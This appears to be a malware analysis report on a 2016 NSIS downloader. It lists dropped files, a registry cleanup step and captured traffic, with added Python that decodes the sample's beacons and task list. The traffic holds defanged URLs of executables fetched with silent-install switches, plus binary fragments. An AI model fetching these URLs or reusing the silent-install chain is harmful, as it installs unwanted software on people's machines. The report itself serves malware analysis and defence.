%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: setup
Product Version: 1.0.0.0
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23462 | 23552 | 4.51398 | 9d64b6ac6eb1aa41e38f6cc8798b652e |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 3774424 | 1024 | 3.26654 | af685ae5a632e08acd6c90a62cdfc3bb |
.ndata | 3813376 | 73728 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 3887104 | 17192 | 17408 | 4.11146 | 9744c9d8118bab5893d7e4c284c0adee |
The .ndata section (raw size 0; its MD5 is the hash of empty input) is the uninitialised data section of a Nullsoft (NSIS) installer stub, consistent with the "Nullsoft Install System v2.46" string in the dumps below. The five sections account for only 46,592 bytes of raw data, so most of the 308,560-byte file is an overlay appended after .rsrc, which is where NSIS keeps its compressed script and the files it drops; the PEiD "packed" verdict reflects that overlay rather than a conventional packer.
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 843
9e690e54fcaaec9e5ab149fdc7b39849
358c5cfa475c092625893377a53bb4b4
65a8ed347f955dc5b0cc72cd41edbda0
0474bc4cdbf6ebb28c41f29f08aff838
56f0773f477f9cd0340c0be299733fec
7d55f8587b19fc4f736b5142fafbf7d4
5ce92582e1a08a0ff321f9340e1050e4
94eefef5bbfc51c6b58cdd78d4d23a60
7360f94503b83a0a7583e4dd3b1a5da7
cead8cb9974398d8a97f11ecadffa99d
5c970638dc1d11b78456803966700f51
32781edd5bd0b472be7f9f3e7b066c17
680a542ac63edbf9b931b5db42883fb1
465c622d673d1c58e5bf257e4474113d
86772153d906b98a65d9a64a910117f6
13ddb0d6ec6ed13888cf211634187f29
00a69d79ba73b543914470b9087a11e8
4f2b2e2301f662eb0c2ef92d267711d2
8bf2fb9cdba8e11b9c67885900eb82d6
67df116b398f91b64eeab7c6fc280bb7
6f377cd73cbf924b48ba52c335a47c78
d4db355aaebca07562d248ae8b8c5635
2ef26b587dab0f74352943849596f24e
150711d4ed93d249436d8e851a9698e7
38aef307050ce93a00fd647bc1b34ef0
Network Activity
URLs
URL | IP |
---|---|
hxxp://data.biphysics.com/r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
hxxp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
hxxp://data.biphysics.com/r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
hxxp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
hxxp://www.download-servers.com/vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=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 | 50.7.86.58 |
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 204.236.233.80 |
hxxp://www.download-servers.com/SysInfo/Validate.exe | 50.7.86.58 |
hxxp://sstatic1.histats.com/0.gif?2601800&101 | 208.43.241.179 |
hxxp://www.download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
hxxp://sstatic1.histats.com/0.gif?2601768&101 | 208.43.241.179 |
hxxp://www.download-servers.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
hxxp://www.download-servers.com/SysInfo/tem.php?sid=83837567483 | 50.7.86.58 |
hxxp://sstatic1.histats.com/0.gif?2601603&101 | 208.43.241.179 |
hxxp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
hxxp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 | 95.211.189.16 |
hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.189.16 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 95.211.210.34 |
hxxp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 95.211.210.34 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET /vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=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 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 253819
Connection: keep-alive
X-Powered-By: PHP/5.5.32
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x...x...x.......z...x...........i...,...t.......y...Richx...................PE..L......K.................\....9.....?2.......p....@...........................J..............................................s........J..............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata...`...0:..........................rsrc.........J......v..............@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....&z..H.P.u..u..u...Hr@..B...SV.5.&z..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..z.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /0.gif?2601603&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......
GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0
hXXp://software-repository.com/Generic/zgm.php?sid=8100001
/install
hXXp://down.eszju.cn/8001/ttwifi.exe
{5DB9279D5A0CB29AA3ED55D055708882}
hXXps://vnl1.izabelcoin.com/vnl1.exe
/PID=1670 /S
hXXp://d2xvc2nqkduarq.cloudfront.net/main/clc_jq.exe
/c=clc /i=106 /s
hXXp://livestatscounter.com/SysInfo/validator/timer.php
hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2
hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe
/verysilent
hXXp://down.hejie123.com/global/yeaplayer.exe
hXXp://VVV.liuzhoua.com/shanghaiuc3.exe
hXXp://cloudfront.7950a1a535832c52ae50f09d3e424734190ffb39.xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe
<<< skipped >>>
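The vos_n.php response above is the downloader's task list: one URL per line, with a bare line after some URLs that the capture suggests is the command-line switch for that download. The Python below is added here as a worked example; it is not part of the Lavasoft report or of the sample's own code. It parses that body, undoes the report's hXXp/VVV. defanging, decodes the base64 path segment of the labst.ru URL into the JSON it carries, and lists which downloads would run unattended. Two things are assumptions: the grouping rule (a non-URL line belongs to the URL immediately above it) is inferred from this capture, not documented by the server, and the quiet-switch set goes beyond the three switches seen here (/S, /s, /verysilent) to the common /silent, /quiet and /q.

```python
import base64
import json
import re

# Body of the /Generic/sys/vos_n.php response as shown in the capture, with the
# report's defanging kept and the chunked-transfer framing removed (constructed here).
VOS_N_BODY = """hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0
hXXp://software-repository.com/Generic/zgm.php?sid=8100001
/install
hXXp://down.eszju.cn/8001/ttwifi.exe
{5DB9279D5A0CB29AA3ED55D055708882}
hXXps://vnl1.izabelcoin.com/vnl1.exe
/PID=1670 /S
hXXp://d2xvc2nqkduarq.cloudfront.net/main/clc_jq.exe
/c=clc /i=106 /s
hXXp://livestatscounter.com/SysInfo/validator/timer.php
hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2
hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe
/verysilent
hXXp://down.hejie123.com/global/yeaplayer.exe
hXXp://VVV.liuzhoua.com/shanghaiuc3.exe
hXXp://cloudfront.7950a1a535832c52ae50f09d3e424734190ffb39.xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe
"""

# Switches that make common Windows installers run without UI. Assumption: the
# capture shows only /S, /s and /verysilent; the rest are the usual NSIS/Inno/MSI spellings.
QUIET_SWITCHES = {"/s", "/silent", "/verysilent", "/quiet", "/q"}


def refang(s: str) -> str:
    """Undo the report's defanging: hXXp(s):// -> http(s)://, VVV. -> www."""
    s = re.sub(r"^hXXp(s?)://", r"http\1://", s)
    return s.replace("://VVV.", "://www.")


def is_url(line: str) -> bool:
    return line.lower().startswith(("http://", "https://"))


def parse_task_list(body: str) -> list:
    """Group every URL with the non-URL lines that follow it.

    Assumption (inferred from this capture): a line that is not a URL is a
    command-line argument for the download immediately above it.
    """
    tasks = []
    for raw in body.splitlines():
        line = refang(raw.strip())
        if not line:
            continue
        if is_url(line):
            tasks.append({"url": line, "args": []})
        elif tasks:
            tasks[-1]["args"].append(line)
    return tasks


def decode_b64_path(url: str):
    """If the last path segment is base64 that ends in a JSON object, return
    {'prefix': <text before the JSON>, 'config': <parsed object>}; else None."""
    last = url.rsplit("/", 1)[-1]
    if not re.fullmatch(r"[A-Za-z0-9+/_-]{16,}=*", last):
        return None
    try:
        text = base64.urlsafe_b64decode(last + "=" * (-len(last) % 4)).decode("utf-8", "replace")
    except ValueError:
        return None
    brace = text.find("{")
    if brace < 0:
        return None
    try:
        obj = json.loads(text[brace:])
    except json.JSONDecodeError:
        return None
    return {"prefix": text[:brace], "config": obj}


def silent_installs(tasks: list) -> list:
    """URLs whose arguments contain a quiet/silent switch (compared case-insensitively)."""
    return [
        t["url"] for t in tasks
        if any(tok.lower() in QUIET_SWITCHES for a in t["args"] for tok in a.split())
    ]


if __name__ == "__main__":
    tasks = parse_task_list(VOS_N_BODY)
    for t in tasks:
        print(t["url"], t["args"])
    print("silent:", silent_installs(tasks))
    print("labst.ru config:", decode_b64_path(tasks[1]["url"]))
```

The labst.ru path decodes to a 32-character alphanumeric prefix followed by a JSON object whose "silent":"1" field says the same thing the /S and /verysilent switches say for the other downloads: the affiliate chain installs without showing the user anything.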
GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: application/octet-stream
Content-Length: 80466
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=tJEcW
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@..........................`&...........@.................................@........@&......................`.......................................................................................text....r.......t.................. ..`.rdata..n .......,...x..............@..@.data.... ..........................@....ndata...P...............................rsrc........@&.....................@..@.reloc.......P&.....................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>
GET /r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:30 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
GET /r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
ok
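The prm= parameter of the IW:Init beacon above is base64, and the landing URL it wraps carries a dp= parameter that is itself two tokens framed by "-_-", the first of which is base64 again. The Python below is added as a worked example and is not part of the Lavasoft report or the sample; it decodes both layers from the captured value. Reading the inner token as a tracking identifier (it contains what looks like a client IP address and a country code) is an inference from its content, not something the capture states, and the second dp token is left opaque because its encoding is not evident.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# prm= value exactly as captured in the IW:Init request above.
PRM = "dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0="

IPV4_RE = re.compile(r"(?<!\d)\d{1,3}(?:\.\d{1,3}){3}(?!\d)")


def b64_lenient(s: str) -> bytes:
    """Decode standard or URL-safe base64 whose padding may have been stripped
    (the inner dp token is sent without '=' padding)."""
    s = s.strip()
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def decode_prm(prm: str) -> dict:
    """Peel the beacon's prm= value: outer base64 -> url={{<landing URL>}} ->
    dp=-_-<base64 token>-_-<opaque token>."""
    outer = b64_lenient(prm).decode("utf-8", "replace")
    m = re.fullmatch(r"url=\{\{(.*)\}\}", outer, re.S)
    if not m:
        raise ValueError("unexpected prm layout: " + outer[:40])
    landing = m.group(1)
    parts = urlsplit(landing)
    query = parse_qs(parts.query, keep_blank_values=True)
    dp = query.get("dp", [""])[0]
    # "-_-" frames the tokens; splitting yields a leading empty string that is dropped.
    segments = [seg for seg in dp.split("-_-") if seg]
    tracking = b64_lenient(segments[0]).decode("utf-8", "replace") if segments else ""
    return {
        "landing_url": landing,
        "landing_host": parts.hostname,
        "channel": query.get("ch", [""])[0],
        "auto": query.get("auto", [""])[0],
        "dp_tracking": tracking,            # decoded first token (interpretation: tracking id)
        "dp_opaque": segments[1] if len(segments) > 1 else "",
        "ip_like": IPV4_RE.findall(tracking),  # dotted quads inside the decoded token, if any
    }


if __name__ == "__main__":
    for key, value in decode_prm(PRM).items():
        print(f"{key}: {value}")
```

The decoded landing page is a CloudFront-hosted HTML page selected by the same ap_100 channel value the beacon sends in the clear, with auto=1; the tracking token is a string of underscore-separated fields, one of which is a dotted quad. When triaging a capture of this family, decode prm= before searching it, or the hostnames and the dotted quad will never match any indicator list.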
GET /r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
GET /r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
GET /r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
